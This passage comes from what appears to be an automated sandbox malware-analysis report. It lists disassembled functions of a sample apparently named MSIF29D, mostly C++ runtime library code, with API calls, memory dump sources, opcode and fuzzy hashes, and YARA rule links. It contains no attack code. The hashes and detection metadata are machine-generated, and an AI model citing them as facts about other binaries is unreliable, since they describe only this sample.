                                                                                                                                                                                                                                                                      • Opcode ID: 62921a7001a096438d8eb5af0f4ed7e29c4fc5b4e3171ebd59b2ecb18c3a3a9c
                                                                                                                                                                                                                                                                      • Instruction ID: 33f609220f6daa13e9c93865a7577058cb4d836fd7ed8d7022d6e6e5193fb0bf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62921a7001a096438d8eb5af0f4ed7e29c4fc5b4e3171ebd59b2ecb18c3a3a9c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01A17190021ADBCB1AEBA4DD42BBE7765AF84720F24440DE50067291CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FC2CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2CE6
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2CF0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2D41
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2D61
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: b04d029a23a4909b7304a82e25048d35dbe54b01679ce56111395e363d047a22
                                                                                                                                                                                                                                                                      • Instruction ID: 248199db712e70fbcb49db24ae045f29b5bf04b89c1dd6b5ee0b78b8d4f2fe1e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b04d029a23a4909b7304a82e25048d35dbe54b01679ce56111395e363d047a22
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B001A171D0021ADBCB16FBA0D942BAD7765BF94720F24050DE50167292CF789E02EB91
                                                                                                                                                                                                                                                                      Function 00FCEC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEC5D
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEC67
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCECB8
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCECD8
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 541eea7b5d3818a760b37f3968090e829849028974d78e0d07c977bbeeb68a7e
                                                                                                                                                                                                                                                                      • Instruction ID: c299ed490b367248f831209715e6a48d5e0845f375ec7f1343f762300c169c14
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 541eea7b5d3818a760b37f3968090e829849028974d78e0d07c977bbeeb68a7e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40016172D0011ADBCB16FBA4D946BAD7B66BF84720F25040DF50167291DF789A01EB91
                                                                                                                                                                                                                                                                      Function 00FC2C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2C51
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2C5B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2CAC
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2CCC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 62ae3b01918f53c158814a30132a4f1dbd31c630080598f19457918f5341d805
                                                                                                                                                                                                                                                                      • Instruction ID: 382a64274e0b8a05a5c36709fec57af1cefef87b1e295c0c5759ded7e4d94ed9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62ae3b01918f53c158814a30132a4f1dbd31c630080598f19457918f5341d805
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0901AD7690111ADBCB16EBA4DA42BBE77A5AF80720F24040DF5016B381CF799A01EBA1
                                                                                                                                                                                                                                                                      Function 00FC2E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2EA5
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2EAF
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2F00
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2F20
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: c85fd895ee46104cb6cd44a77000753d9722aac50c4e25f8f85e64bcf7b831af
                                                                                                                                                                                                                                                                      • Instruction ID: f619a8184ffafa76418fdb55c3205b883a628dd233e3f6109b30f441e9800f21
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c85fd895ee46104cb6cd44a77000753d9722aac50c4e25f8f85e64bcf7b831af
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201847590011ADBCB16EBA4DD42BBD7775BF84710F24050DF51067291CF789E01EBA1
                                                                                                                                                                                                                                                                      Function 00FC2E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2E10
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2E1A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2E6B
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2E8B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 238e81ebf7e57a99cbd84e37e10c42b27fec81685fc1bb7ca7b5e4d16385e1ed
                                                                                                                                                                                                                                                                      • Instruction ID: 5d6adbdcb283d5816de252d49aa79f9ca06320ac81c848d390f67eeb1b3917a8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 238e81ebf7e57a99cbd84e37e10c42b27fec81685fc1bb7ca7b5e4d16385e1ed
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1501A17690011ADBCB16EBA4C902BBE7765BF94710F24050DE50067291CF789A05EB91
                                                                                                                                                                                                                                                                      Function 00FC2F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2F3A
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2F44
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2F95
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2FB5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: de17326c13c25658b95ee421fab75561d4df18f9f0c1347d820f655748b33024
                                                                                                                                                                                                                                                                      • Instruction ID: 96f8454480e2562e25fcad3b4479fbe41dbf4bf932e66936e01d33d9a3d92b8a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de17326c13c25658b95ee421fab75561d4df18f9f0c1347d820f655748b33024
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201A17290011ADBCB15EBA4DD02BBDB776BF84720F24040DF50067291CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FF3686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000), ref: 00FF369D
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?,?,?,00FF271F,?), ref: 00FF36A9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FF366F: CloseHandle.KERNEL32(FFFFFFFE,00FF36B9,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?,?), ref: 00FF367F
                                                                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 00FF36B9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FF3631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FF3660,00FF3040,?,?,00FF2198,?,?,00000000,?), ref: 00FF3644
                                                                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00FF3053,?,00000001,?,?,?,00FF2198,?,?,00000000,?), ref: 00FF36CE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3f2e2301d68b77df2228f1ade81e598a417a16f66645df3a7546c6df98b102be
                                                                                                                                                                                                                                                                      • Instruction ID: efda6c52796df75854ba139f4378453a48dccf7bfe1c0cb5959fe55e4b330ecd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f2e2301d68b77df2228f1ade81e598a417a16f66645df3a7546c6df98b102be
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0F83690421CBBCF222F959C04DA97F6AFF493A1B004050FB1996230DA328920FB90
                                                                                                                                                                                                                                                                      Function 00FD2D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,00FD2CBD,00000064), ref: 00FD2D43
                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D4D
                                                                                                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D5E
                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0100DD3C,?,00FD2CBD,00000064,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2D65
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9107ed09de7c810045b101a10948d63428ee6f7b21d6f71ed536433eec1437e0
                                                                                                                                                                                                                                                                      • Instruction ID: 42568e59eef2f7675212bdd1cae22484f930d244300e3c52fa2fcbe10b853763
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9107ed09de7c810045b101a10948d63428ee6f7b21d6f71ed536433eec1437e0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0D832505628BBDB233BC4EC08AAE7F2EEF04B11F040053F54666171CB650A00EBF2
                                                                                                                                                                                                                                                                      Function 00FBEC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FBEC8E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: __EH_prolog3.LIBCMT ref: 00FBD883
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: std::_Lockit::_Lockit.LIBCPMT ref: 00FBD88D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD8FE
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FBEE8A
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FBECF6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: b88b8a52d6b50230c0e1242dd2ac9e771c26d84e7c297d169c6b2ac10df1accb
                                                                                                                                                                                                                                                                      • Instruction ID: abfd76e5e42950eea06d34a9774fdd0ce98eb7dfd97c357453383f3312a12130
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b88b8a52d6b50230c0e1242dd2ac9e771c26d84e7c297d169c6b2ac10df1accb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCC1A034E042888EDF25DFA5C9407FCBBB2AF55310F2840A9E8856B287CB749D46EF51
                                                                                                                                                                                                                                                                      Function 00FC62BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC62C8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: __EH_prolog3.LIBCMT ref: 00FC2D7B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: std::_Lockit::_Lockit.LIBCPMT ref: 00FC2D85
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2DF6
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FC6502
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FC633F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: 47053bb784ad00e024fee3f359785e205074ecc8e01cfdc16ee06f3dd49cafb5
                                                                                                                                                                                                                                                                      • Instruction ID: 1e2e1cdab164f431c09c2891385cf9c19a1b65b5e940d60597a64ae693089eb8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47053bb784ad00e024fee3f359785e205074ecc8e01cfdc16ee06f3dd49cafb5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1C670E0825A8BDF25DF64CA42FACBBB1BF54314F58809DD845EB286DB349C85EB50
                                                                                                                                                                                                                                                                      Function 00FC6694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC669E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00FBB8DD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00FBB900
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB928
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB9B7
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FC68D8
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00FC6715
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
